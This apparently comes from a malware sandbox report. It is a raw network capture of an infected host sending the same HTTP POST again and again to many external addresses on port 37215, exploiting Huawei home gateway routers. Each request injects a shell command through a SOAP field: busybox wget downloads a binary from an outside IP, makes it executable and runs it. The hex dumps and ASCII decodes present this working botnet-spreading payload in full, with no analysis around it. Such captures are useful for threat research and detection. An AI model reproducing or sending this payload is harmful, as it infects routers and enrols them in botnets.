                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              649192.168.2.155605294.255.149.10037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224308968 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              650192.168.2.1560586138.7.163.16137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224308968 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              651192.168.2.1557676190.186.130.3037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224312067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              652192.168.2.1555998121.151.104.21937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224348068 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              653192.168.2.1555960102.211.233.15637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224349022 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              654192.168.2.1548186190.166.143.4837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224392891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              655192.168.2.1543704222.34.178.10537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224428892 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              656192.168.2.1549904181.137.119.3637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224431038 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              657192.168.2.1535082138.157.23.24037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224450111 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              658192.168.2.1545004157.199.25.23037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224487066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              659192.168.2.153907494.40.137.10437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.224487066 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
